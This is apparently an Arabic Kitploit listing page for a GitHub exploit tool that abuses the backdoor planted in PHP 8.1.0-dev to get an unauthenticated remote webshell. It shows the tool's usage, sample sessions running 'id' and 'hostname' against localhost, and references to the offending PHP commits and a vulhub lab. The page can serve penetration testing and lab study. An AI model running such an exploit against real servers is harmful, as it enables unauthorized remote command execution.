Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
PHP-8.1.0-dev_WebShell-RCE — PHP 8.1.0-dev WebShell تنفيذ الأوامر عن بُعد | Kitploit
أدوات/GitHubGitHub/coldfusionx/php-8.1.0-dev_webshell-rce
الاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعدتطوير الحمولات
GitHubcoldfusionx/php-8.1.0-dev_webshell-rce

PHP-8.1.0-dev_WebShell-RCE

PHP 8.1.0-dev WebShell تنفيذ الأوامر عن بُعد

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
311منذ 5 سنواتلم تتم المراجعة بعد
مشاركة

PHP 8.1.0-dev WebShell RCE (بدون مصادقة)

كود استغلال لـ PHP 8.1.0-dev WebShell RCE (بدون مصادقة)

النتيجة المتوقعة: استغلال الباب الخلفي المثبّت على خادم PHP 8.1.0-dev وبالتالي الحصول على WebShell لتنفيذ الأوامر عن بُعد.

مصمم للأغراض التعليمية والاختبار في بيئات الشركات فقط.

تم اختبار هذا الاستغلال على Python 3.8.6

الاستخدام:

root@kitploit:~
cfx:  ~/Documents/
→ ./exploit.py -h
usage: exploit.py [-h] [-l URL]

PHP 8.1.0-dev WebShell RCE by ColdFusionX

optional arguments:
  -h, --help         show this help message and exit
  -l URL, --url URL  PHP 8.1.0-dev Target URL(Example: http://127.0.0.1)

Exploit Usage : 
./exploit.py -l http://127.0.0.1
[^] WebShell=- id
OR
[^] WebShell=- whoami

مدخلات المستخدم:

يتطلب هذا الاستغلال وسيطات مفردة للتشغيل مبدئيًا:

  • -l : رابط الهدف لـ PHP 8.1.0-dev

POC

  • السيناريو 1: هدف صالح ومعرّض للثغرة
root@kitploit:~
cfx:  ~/Documents/
→ ./exploit.py -l http://127.0.0.1

[+] PHP 8.1.0-dev WebShell RCE by ColdFusionX 
 
Target is running on PHP 8.1.0-dev

*Shoot your commands below* 

[^] WebShell=- id

uid=1000(cfx) gid=1000(cfx) groups=1000(cfx)

[^] WebShell=- hostname

shockwave

[^] WebShell=- ^C
Exiting.
  • السيناريو 2: هدف غير صالح
root@kitploit:~
cfx:  ~/Documents/
→ ./exploit.py -l http://127.0.0.1

[+] PHP 8.1.0-dev WebShell RCE by ColdFusionX 
 
Invalid URL or Target Not Vulnerable

المراجع

  • https://github.com/vulhub/vulhub/tree/master/php/8.1-backdoor
  • https://news-web.php.net/php.internals/113838
  • https://github.com/php/php-src/commit/c730aa26bd52829a49f2ad284b181b7e82a68d7d
  • https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
تنزيل الأداة